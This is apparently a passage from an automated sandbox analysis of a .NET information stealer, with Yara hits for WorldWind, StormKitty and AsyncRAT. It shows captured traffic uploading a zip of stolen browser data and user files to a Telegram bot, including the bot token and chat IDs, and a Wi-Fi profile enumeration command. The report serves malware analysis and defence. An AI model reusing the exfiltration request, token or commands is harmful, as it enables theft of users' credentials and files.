                                                                                                                                                            2023-06-23 19:21:41 UTC182OUTData Raw: 91 38 28 e4 cc 19 fb 75 a4 ed d1 c1 33 c4 73 4f e2 a5 c1 bc 36 ab 2b 65 91 46 55 1e c9 b8 4f c3 be f9 82 20 8b 41 8a 20 39 18 68 4f 68 40 3d 2c 60 e3 98 e8 61 eb be 23 ad 73 47 39 7c 3e 9e 67 e5 c7 db e7 cf b1 5a 24 b2 a7 fb 6e e7 a2 46 d2 df 1f 8c e1 93 49 b5 6f 34 78 74 58 44 ab dd 50 d2 89 d1 cf 4a bd 5e 34 b3 2e 7e a2 90 af c7 8d d0 8f 54 5d 65 68 7c 4f 57 de 4c 93 7e 9d 2c 02 27 5a 8a a0 c4 2f 73 cc d6 ed ed e0 86 f0 16 a5 de 91 51 54 00 f7 15 d2 76 85 2b a4 c4 0a 39 0f b5 f0 d4 bb df ee 56 56 78 8f 98 7d f4 08 85 b3 2a b9 f2 d0 c4 3a 5d f9 f8 c8 23 e9 7c df 33 05 59 2b fa 89 8a 52 dd 72 6b 76 22 a6 83 eb 4d 06 d5 70 28 d9 e1 8b ec df a9 d7 f3 0f 15 77 d3 9f b2 a7 ff 60 7b cf 16 c2 2b 1d d3 ba fd c7 d0 de 51 b0 d0 49 11 ef aa b4 db e7 2a c9 8c ea b4
                                                                                                                                                            Data Ascii: 8(u3sO6+eFUO A 9hOh@=,`a#sG9|>gZ$nFIo4xtXDPJ^4.~T]eh|OWL~,'Z/sQTv+9VVx}*:]#|3Y+Rrkv"Mp(w`{+QI*
                                                                                                                                                            2023-06-23 19:21:41 UTC196OUTData Raw: 0d 0a 2d 2d 31 62 32 63 33 64 62 33 2d 34 63 34 33 2d 34 61 34 30 2d 62 61 31 36 2d 38 66 30 61 36 36 34 37 64 37 35 61 2d 2d 0d 0a
                                                                                                                                                            Data Ascii: --1b2c3db3-4c43-4a40-ba16-8f0a6647d75a--
                                                                                                                                                            2023-06-23 19:21:42 UTC196INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:42 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 623
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            {"ok":true,"result":{"message_id":3919,"from":{"id":6154715708,"is_bot":true,"first_name":"oRG","username":"XChannX_bot"},"chat":{"id":1165040754,"first_name":"\u0196\u1ee9\u010d\u1ecb\u1e1f\u0454\u04f7","last_name":"\uff7f\u012f\u028d\u1e4d\u1e5d\u1e45\u0268\u1e45\u0262\u0455\u1e6f\u1ea3\u1e5d","username":"Lucifer7005","type":"private"},"date":1687548101,"document":{"file_name":"C_UsersuserAppDataLocal1748642afea85b545bfef23bd04430d7engin.zip","mime_type":"application/zip","file_id":"BQACAgEAAxkDAAIPT2SV8MW7lID9JvBX_3BPgD9yguG2AAJXBAACLkCwRJzx3yEiUSm6LwQ","file_unique_id":"AgADVwQAAi5AsEQ","file_size":194429}}}


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.649719149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2023-06-23 19:21:42 UTC197OUTPOST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
                                                                                                                                                            Content-Type: multipart/form-data; boundary="e77a6233-58d8-4287-8763-8e3899d68419"
                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                            Content-Length: 194790
                                                                                                                                                            Expect: 100-continue
                                                                                                                                                            2023-06-23 19:21:42 UTC197INHTTP/1.1 100 Continue
                                                                                                                                                            2023-06-23 19:21:42 UTC197OUTData Raw: 2d 2d 65 37 37 61 36 32 33 33 2d 35 38 64 38 2d 34 32 38 37 2d 38 37 36 33 2d 38 65 33 38 39 39 64 36 38 34 31 39 0d 0a
                                                                                                                                                            Data Ascii: --e77a6233-58d8-4287-8763-8e3899d68419
                                                                                                                                                            2023-06-23 19:21:42 UTC197OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 31 37 34 38 36 34 32 61 66 65 61 38 35 62 35 34 35 62 66 65 66 32 33 62 64 30 34 34 33 30 64 37 5c 65 6e 67 69 6e 65 65 72 40 31 31 36 39 33 38 5f 65 6e 2d 55 53 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 65 6e 67 69 6e 65 65 72 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 31 37 34 38 36 34 32 61 66 65 61 38 35 62 35 34 35 62 66 65 66 32 33 62 64 30 34 34 33 30 64 37 25 35 43 65 6e 67 69 6e 65 65 72 25
                                                                                                                                                            Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C1748642afea85b545bfef23bd04430d7%5Cuser%
                                                                                                                                                            2023-06-23 19:21:42 UTC198OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b2 aa d7 56 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 aa aa d7 56 1d 40 64 55 92 01 00 00 59 04 00 00 17 00 00 00 44 69 72 65 63 74 6f 72 69 65 73 5c 44 65 73 6b 74 6f 70 2e 74 78 74 7d 52 cb 6e 83 30 10 3c b7 52 ff 21 5f 60 f5 21 f5 6e b0 8d 31 c1 0f 82 71 83 7a 0b 24 4a 9b 06 d4 f4 90 cf 6f 78 38 d0 6e d5 1b b3 32 3b b3 33 43 ea d3 fb 57 d3 be de dd de 04 96 95 2b a3 43 c5 3b 44 8c 62 bc e0 79 1a f5 c8 26 f2 25 0e 55 99 77 88 61 1c 39 1e 14 d6 f6 28 c2 4e 15 a5 15 ba 43 dc 88 20 23 eb 84 d0 0e cd 9e a2 b7 76 d7 4d 22 11 70 67 48 a6 04 6a 8f c3 44 2e 8d e4 6a e9 02 d4 56 db 6e 32 2d 41 55 b3 39 77 23 19 67 29 4d 70 5a 72 74 3e 9c fa 51 69 d7
                                                                                                                                                            Data Ascii: PKVBrowsers\Google\PKV@dUYDirectories\Desktop.txt}Rn0<R!_`!n1qz$Jox8n2;3CW+C;Dby&%Uwa9(NC #vM"pgHjD.jVn2-AU9w#g)MpZrt>Qi
                                                                                                                                                            2023-06-23 19:21:42 UTC214OUTData Raw: 44 65 73 6b 74 6f 70 5c 57 53 48 45 4a 4d 44 56 51 43 2e 78 6c 73 78 15 93 57 72 40 21 08 45 ff 33 93 45 29 28 56 6c 3c db fe 17 12 f3 cd 80 e7 16 d7 70 26 64 9c 0d 56 a8 de af 6c 9c a9 45 f7 93 ca 2d ce 66 34 e6 1c 35 fa ad 2e 5c b2 0c 71 f9 36 aa fe f2 d2 10 31 8b d1 d6 b3 4a 47 59 0a 5f db 9e 99 30 0e d4 56 b7 e4 ce ed 29 61 38 63 f2 9e de 54 7f dc a5 22 aa 9f 8f ab e5 3b fb 9c cb 97 b5 ac b7 0b dc 9c 6e 33 45 cb 9d d3 9c a3 d4 92 e9 02 b6 6f 05 ab 7a 14 50 73 62 15 a8 ec 31 75 1a 89 e3 95 d9 55 50 3e 1d c2 e9 95 22 3f e3 ee d0 a5 df 50 a3 92 78 d5 ea 41 ea 4c 82 ac d1 77 5c 00 4e 8b 99 86 4e 3d 28 34 72 fa b0 ed dc de 75 97 4e ee b1 c2 74 cd 65 62 20 7d 63 f9 22 80 76 ad 0e 7f 7c 78 af 94 13 42 e8 2d 61 e4 f9 99 8d 11 44 f1 c8 e0 c2 a7 7d 41 95 f6 fa
                                                                                                                                                            Data Ascii: Desktop\WSHEJMDVQC.xlsxWr@!E3E)(Vl<p&dVlE-f45.\q61JGY_0V)a8cT";n3EozPsb1uUP>"?PxALw\NN=(4ruNteb }c"v|xB-aD}A
                                                                                                                                                            2023-06-23 19:21:42 UTC230OUTData Raw: f7 b9 c0 fb ea 5a e0 cf 3b 77 fc bf 51 3b d7 fc db 18 cf 95 64 73 4f 5f 13 ab bf 00 50 4b 03 04 14 00 00 00 08 00 11 7f 10 55 e0 69 f1 7b 81 02 00 00 02 04 00 00 37 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 6f 63 75 6d 65 6e 74 73 5c 46 41 41 47 57 48 42 56 55 55 2e 6a 70 67 0d 92 c7 91 45 31 08 04 ef 5b f5 83 12 f2 1e 64 40 52 fe 81 ec bb ce 01 c6 b4 53 ca 4b 00 de 7b e1 65 0c d1 e8 bc 26 c0 4c 5b 16 ee 39 09 6b a0 6d ab 05 a7 87 74 e5 13 90 ab 47 79 18 88 ae 86 2b 2f f2 b8 70 6b c9 f3 c0 e4 58 40 0f 6b 4b 14 9d 4f 2b da 45 b1 cf e4 da b4 33 ae b3 94 6e 38 93 79 fe 93 6e 2e 36 0c 28 7b 1a 56 6f a3 1a 36 2f 2f 38 ab cd db d5 59 c2 89 19 62 76 98 df c2 d8 39 0a 6b b6 09 b4 d5 a9 f2 1b b2 1d 65
                                                                                                                                                            Data Ascii: Z;wQ;dsO_PKUi{7Grabber\DRIVE-C\Users\user\Documents\FAAGWHBVUU.jpgE1[d@RSK{e&L[9kmtGy+/pkX@kKO+E3n8yn.6({Vo6//8Ybv9ke
                                                                                                                                                            2023-06-23 19:21:42 UTC246OUTData Raw: 01 4b a2 87 98 56 07 b3 8b d2 54 f2 7a 5e 96 f8 66 56 db 4c 7b 77 4b 19 2f 8d 68 d5 dd 2a 09 28 bb 22 a4 dd 0e 84 88 aa 5d bc f1 65 89 1a 47 86 96 af 6d c1 c9 09 45 79 38 09 cc e7 37 ab c4 5a 35 ba 75 f3 0a b0 0c 29 1e 08 fd db c6 fd 40 72 cb 95 70 03 81 09 c2 6c dd 87 6d ed 89 d3 b7 d3 7b 76 02 9c 1e 25 0c 59 72 48 95 fc cc a5 80 f2 3d 10 b5 46 84 1e 34 42 b8 92 ba dc b5 d5 c0 47 3b da 01 6f de a8 fa 6c 97 03 f3 7d 1e 83 99 cc cf 8d 76 2c f7 94 b9 fa a5 6c 38 5e cb c7 d3 e9 14 cd b7 3a 4e fe 72 0a 88 cc 41 62 ee dc a7 ec 5b ad a7 64 ed fd 94 6b db e2 ea f9 fc 53 b8 73 dc f5 6c bd d4 e1 26 a9 b9 77 93 f4 9e 58 1c ce 08 c7 75 9f fc d6 5f cf 8c 67 1e 6e 9a 6b bd ea a8 f6 fc c8 ac ff 62 44 c7 94 d5 8c 48 4f 67 a7 82 60 7f 77 ae c2 8e 5e 3b c3 ae 72 77 c6 f7
                                                                                                                                                            Data Ascii: KVTz^fVL{wK/h*("]eGmEy87Z5u)@rplm{v%YrH=F4BG;ol}v,l8^:NrAb[dkSsl&wXu_gnkbDHOg`w^;rw
                                                                                                                                                            2023-06-23 19:21:42 UTC261OUTData Raw: 13 7c a9 99 55 30 2b bc ba 67 3d ed f9 e2 ea a9 47 1f db 47 4f f9 0c 69 ad 94 62 1e b2 ab a3 43 72 31 22 36 f1 6e 8a d6 fe db 98 5c f3 77 51 ba f2 b6 9d 11 57 ba 1f 81 cd d3 52 d2 be 92 45 f5 0f 78 2a e3 2e de 2f 7c 8f 9a 9a c6 10 53 8b 2f 45 4f 60 4f 46 b5 d9 27 eb 6e 82 f9 f0 5e e3 50 0b 61 3e f3 d5 87 a3 58 f0 19 70 05 9c 2a 8f 6b 6a f6 21 5b 93 e9 d8 06 a5 a5 7e e6 16 78 29 13 25 c5 f9 6b 5d 01 cc 3d 50 3c bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 11 7f 10 55 f7 8b 5b 6c 85 02 00 00 02 04 00 00 37 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 6f 77 6e 6c 6f 61 64 73 5c 47 4e 4c 51 4e 48 4f 4c 57 42 2e 70 64 66 15 93 49 92 40 21 08 43 f7 5d d5 87 72 04 67 11 c5 e1 fe 07 e9 df 2b 37 50 c4 e4 05 6a
                                                                                                                                                            Data Ascii: |U0+g=GGOibCr1"6n\wQWREx*./|S/EO`OF'n^Pa>Xp*kj![~x)%k]=P<?PKU[l7Grabber\DRIVE-C\Users\user\Downloads\GNLQNHOLWB.pdfI@!C]rg+7Pj
                                                                                                                                                            2023-06-23 19:21:42 UTC277OUTData Raw: a0 e0 69 cc a7 a6 1d 2a ee a8 3c c5 ca 61 2d ee 21 1f df 25 13 72 31 89 bb aa b7 08 68 e5 59 dc 63 02 f8 99 3b 70 c0 9e b6 fc 5d 54 e3 a3 8d 17 b9 22 4e c3 11 48 ef 13 96 ef b0 15 ff b7 aa 90 9a b9 7a 6d bd 9a 3e 06 89 0a bd 87 cc 96 2a 2f 7e 58 ee 09 ac e1 80 c3 e3 e6 53 a0 24 2d 32 e0 ca 99 02 aa bb b2 00 07 8c cd e1 80 15 fc b2 a2 1d 0c e2 38 1a 5e 35 66 57 5f 19 b2 44 41 a5 e7 f3 f8 0e b7 73 13 5e 22 17 c7 ef de b4 44 de a3 9c e5 0b c0 93 fd ec c4 15 9c 2c 4e f8 cb ed fd c7 ae 2d c8 07 cd fc 53 bd b6 d4 5f ae 6f 79 51 ea 7c c6 01 eb 06 33 54 c7 4d 3f 0c 76 36 30 91 ed 61 e4 49 05 d8 84 e6 29 ae 9a 23 85 e6 5b f9 ba 98 70 cc 9b fa e7 9e 38 40 5c 7a 2c 38 2e 38 bd d1 e9 00 07 dc 78 14 e7 eb 29 3d aa e1 a9 49 55 05 ab 84 9d 89 df dc 65 54 78 9f bc f5 a1
                                                                                                                                                            Data Ascii: i*<a-!%r1hYc;p]T"NHzm>*/~XS$-28^5fW_DAs^"D,N-S_oyQ|3TM?v60aI)#[p8@\z,8.8x)=IUeTx
                                                                                                                                                            2023-06-23 19:21:42 UTC293OUTData Raw: 8c c3 92 b8 68 14 aa 4a 0d f4 de dc 0e 54 b8 14 85 b0 9e b1 03 e7 eb bf 44 92 94 5b 10 12 17 e5 25 b2 cb f8 78 4d 24 3a 1d ca 33 e3 cc 53 88 4e 64 1f 4d ba 43 6a 75 51 f5 2c a5 43 15 81 e8 b8 df ea 58 22 0d 55 01 1b fb f2 e6 66 40 f9 79 5e 29 11 6b 8d e4 f0 3b a0 6e 39 ac 16 8a 7e 06 89 ce c4 82 6c 1a 3a c0 e0 51 fd 98 65 8c 3b 1c 3e 15 d4 90 96 9b 12 85 a2 4f 22 72 4f 92 ce 43 0b 55 05 25 73 27 12 d2 3f 4a 7d 50 5f 09 ff f2 50 bf c0 87 23 36 09 03 34 da f8 4f 0d b9 a3 96 cf c4 6b f0 c3 d9 42 1f 9d b1 1c 57 cd 93 29 5d 2f 73 1b dd d4 ac d2 dc 30 d6 2f fc ca 69 f5 d3 ae 1d e5 a0 bf e2 2b 4f ad 9c 63 ee 70 2a 8e 2b 33 b5 65 aa a8 cb b2 cb 3d 4a 09 37 e6 ef bb 91 1a 94 f3 a6 cd f9 43 b8 8f 16 bd 1f c5 2b f1 ab 62 af ee 2f 07 80 f0 cc de 36 38 cd 15 75 f9 ee
                                                                                                                                                            Data Ascii: hJTD[%xM$:3SNdMCjuQ,CX"Uf@y^)k;n9~l:Qe;>O"rOCU%s'?J}P_P#64OkBW)]/s0/i+Ocp*+3e=J7C+b/68u
                                                                                                                                                            2023-06-23 19:21:42 UTC309OUTData Raw: b3 79 91 5c cc ba 37 18 d7 df 46 7c 59 70 71 79 96 a3 ed 30 fa 7c 1e 7d d3 3c a9 7e 8a b6 2c 6c 00 21 57 58 05 89 df 55 26 c1 b3 2f 65 9b 69 95 b8 f6 11 80 b1 08 15 5b 1d 8c ef 85 37 bf e6 c2 8c 31 2b ff 99 e6 76 92 f9 09 54 ea 8a df f7 52 66 16 fe b4 50 37 0a cf 87 5d 1e bd ab f1 08 e3 c0 5b 23 dd 18 1c 16 e3 6a 53 85 3e 9d 1d 5e 28 a8 8f 2c 7c db 37 cd 0f e6 2e 58 ba 7f eb 91 0c aa d8 63 d1 28 65 40 93 0b 6f 25 67 65 ce 50 66 d7 78 a6 66 23 8c 1d a4 e8 aa 0b e7 43 dd 78 a0 6e 41 92 2d 0d bd 70 fd a6 5e ed 62 68 86 f8 50 ec 5f 8e d8 a0 9d ec 28 55 f7 5e f1 37 cf ea 15 7e c3 09 1f 00 6e 99 35 c8 29 e6 1b 39 a9 6e 8f ff 25 00 42 c7 4f a2 c1 62 05 63 73 b8 93 cc bc c1 8a fe a4 a3 a1 ce 36 3b b5 38 ec c9 92 19 eb ed da 14 d3 af 54 7d 54 9e 7d 85 b7 d8 94 a3
                                                                                                                                                            Data Ascii: y\7F|Ypqy0|}<~,l!WXU&/ei[71+vTRfP7][#jS>^(,|7.Xc(e@o%gePfxf#CxnA-p^bhP_(U^7~n5)9n%BObcs6;8T}T}
                                                                                                                                                            2023-06-23 19:21:42 UTC325OUTData Raw: 9f d9 86 1e ee ad 9b 8d 18 18 3d 13 b2 25 d5 3b 53 a4 1a 79 dd 7c 6f 34 03 aa 37 a5 61 d5 7d 2d 7f ae 48 16 df 9d df 9a 9c a8 88 db fe 05 cd 23 35 3f 53 95 83 04 55 1b 0c 7f 72 24 1e 10 fa 3f 64 bd 67 54 53 c1 16 36 1c 41 44 51 40 34 20 20 55 40 08 88 88 80 14 81 80 4a 2f 91 50 8d 14 e9 04 44 9a 74 21 80 22 10 7a 97 00 06 02 a1 48 13 08 bd a9 74 11 29 a1 49 ef bd f7 96 e4 0d f7 de ef 7b 7f bc 6b 91 95 93 99 3d e7 30 67 66 f6 f3 3c e7 cc ec 31 a7 34 3c 53 04 fd 22 82 d5 3b b1 39 05 1d a6 bf ae 54 8d cd e5 46 3e 93 69 c3 a0 87 78 45 0a 7e 8c 11 7b a3 87 92 37 76 3c 25 c2 34 46 ff 93 a4 30 76 f6 de 14 87 39 95 3d 28 14 45 79 75 43 5b 54 d1 05 0a e3 77 fa e8 f6 77 fc ee 1c 15 5c 89 f2 b3 6f 2c bf e7 5f c4 f4 1e 4e fe fd 4d d1 8f fe a8 20 85 e5 00 db 79 20 e1
                                                                                                                                                            Data Ascii: =%;Sy|o47a}-H#5?SUr$?dgTS6ADQ@4 U@J/PDt!"zHt)I{k=0gf<14<S";9TF>ixE~{7v<%4F0v9=(EyuC[Tww\o,_NM y
                                                                                                                                                            2023-06-23 19:21:42 UTC341OUTData Raw: ab 6f 42 5f f7 0e 84 3b 71 4b d1 4c 25 be bf b7 05 09 2f a6 93 a3 52 95 55 cc 69 8e 50 6c 1a 63 8c 28 65 94 ff a3 35 17 f2 f1 38 27 92 fe 8a 91 7a a5 4c a0 5d c7 64 aa b2 8a a9 50 5c 52 9b dd a2 95 68 a5 a2 5c 41 35 5e d6 31 47 e5 3a 6f 2c 73 d4 63 20 1d 2e 72 0e 4c 2f dd f5 63 b5 3d 7f 77 ad 3b d8 58 49 a6 1c 5d ee f3 b5 48 53 9e b5 88 59 51 af 22 8a 4f 7c ac 0a 2c 5c 1f 42 a4 34 d0 6d 3e fd 48 02 74 51 50 37 31 f6 6b 15 c3 ef 04 10 52 8d 1c 9c 6c a3 19 d3 e5 2a 06 7f 08 3b ce 0a 58 eb 8e f9 8f 2e 1b fd 2e 71 ef 5a 4d e9 7c 40 25 b5 7e 82 0c 9b 09 cf fa 13 c9 4a ef 91 af 12 b2 31 c7 d9 34 c0 6d 96 59 b8 96 2e 64 64 bc 19 f3 5b ce 40 73 c8 b8 b2 ca a5 6a eb 9e cb 01 63 bd f4 2a a2 ab f9 da b3 34 f9 f6 c9 bf e8 75 18 90 73 cd e9 08 7d 68 77 66 18 c2 bd 5c
                                                                                                                                                            Data Ascii: oB_;qKL%/RUiPlc(e58'zL]dP\Rh\A5^1G:o,sc .rL/c=w;XI]HSYQ"O|,\B4m>HtQP71kRl*;X..qZM|@%~J14mY.dd[@sjc*4us}hwf\
                                                                                                                                                            2023-06-23 19:21:42 UTC357OUTData Raw: c7 f4 86 f6 ae a5 3b f4 8a 81 a5 34 27 f4 ff 23 5f 01 e2 fb b6 f0 b7 85 60 80 94 c1 91 b4 d6 d6 31 83 e5 f9 55 7f 8f fb c7 d5 dd b0 80 d1 8c ee 1f da 45 2d 1b 3d eb 5b 9f 90 dc a5 d9 a9 84 53 02 84 2a 01 f8 99 56 f1 42 3e 1b 05 22 b0 5d a8 2a 09 9e d3 26 05 36 4a 82 c7 b9 89 c6 b2 c1 93 83 fd c4 81 1a 6a d3 61 fb 72 41 78 9d 8d 57 fd 78 ca 0c 74 51 02 36 81 e0 24 c0 c7 b4 89 e2 84 d9 9f 5e e0 38 4c e0 46 3e 61 b9 e6 37 2c 16 1f 72 81 84 f9 21 40 76 23 10 cf 9b 73 32 dd 32 c9 f0 da 4a dd fc 3f c7 c6 5b 6e dc e0 c9 7e 4a a1 07 ba ba e4 30 b4 22 06 98 8c c9 24 01 d6 e6 0e 06 6a cd 33 53 d2 e7 e2 e5 ed 16 2d 6d 22 46 0c dc d0 cf 4b b0 ce 1b a8 27 cc 14 ed 64 63 44 dc e8 c1 af 49 42 44 94 95 94 a5 57 5d b4 e6 cc e5 70 56 29 ea dc 1c 30 ee 5e 4e 49 3c 01 17 51
                                                                                                                                                            Data Ascii: ;4'#_`1UE-=[S*VB>"]*&6JjarAxWxtQ6$^8LF>a7,r!@v#s22J?[n~J0"$j3S-m"FK'dcDIBDW]pV)0^NI<Q
                                                                                                                                                            2023-06-23 19:21:42 UTC373OUTData Raw: 91 38 28 e4 cc 19 fb 75 a4 ed d1 c1 33 c4 73 4f e2 a5 c1 bc 36 ab 2b 65 91 46 55 1e c9 b8 4f c3 be f9 82 20 8b 41 8a 20 39 18 68 4f 68 40 3d 2c 60 e3 98 e8 61 eb be 23 ad 73 47 39 7c 3e 9e 67 e5 c7 db e7 cf b1 5a 24 b2 a7 fb 6e e7 a2 46 d2 df 1f 8c e1 93 49 b5 6f 34 78 74 58 44 ab dd 50 d2 89 d1 cf 4a bd 5e 34 b3 2e 7e a2 90 af c7 8d d0 8f 54 5d 65 68 7c 4f 57 de 4c 93 7e 9d 2c 02 27 5a 8a a0 c4 2f 73 cc d6 ed ed e0 86 f0 16 a5 de 91 51 54 00 f7 15 d2 76 85 2b a4 c4 0a 39 0f b5 f0 d4 bb df ee 56 56 78 8f 98 7d f4 08 85 b3 2a b9 f2 d0 c4 3a 5d f9 f8 c8 23 e9 7c df 33 05 59 2b fa 89 8a 52 dd 72 6b 76 22 a6 83 eb 4d 06 d5 70 28 d9 e1 8b ec df a9 d7 f3 0f 15 77 d3 9f b2 a7 ff 60 7b cf 16 c2 2b 1d d3 ba fd c7 d0 de 51 b0 d0 49 11 ef aa b4 db e7 2a c9 8c ea b4
                                                                                                                                                            Data Ascii: 8(u3sO6+eFUO A 9hOh@=,`a#sG9|>gZ$nFIo4xtXDPJ^4.~T]eh|OWL~,'Z/sQTv+9VVx}*:]#|3Y+Rrkv"Mp(w`{+QI*
                                                                                                                                                            2023-06-23 19:21:42 UTC387OUTData Raw: 0d 0a 2d 2d 65 37 37 61 36 32 33 33 2d 35 38 64 38 2d 34 32 38 37 2d 38 37 36 33 2d 38 65 33 38 39 39 64 36 38 34 31 39 2d 2d 0d 0a
                                                                                                                                                            Data Ascii: --e77a6233-58d8-4287-8763-8e3899d68419--
                                                                                                                                                            2023-06-23 19:21:42 UTC388INHTTP/1.1 400 Bad Request
                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:42 GMT
                                                                                                                                                            Content-Type: application/json
                                                                                                                                                            Content-Length: 56
                                                                                                                                                            Connection: close
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                            {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:21:21:12
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                            Imagebase:0xee0000
                                                                                                                                                            File size:174080 bytes
                                                                                                                                                            MD5 hash:C03A7CEDC3314E6F0DC26431503DD035
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                            • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
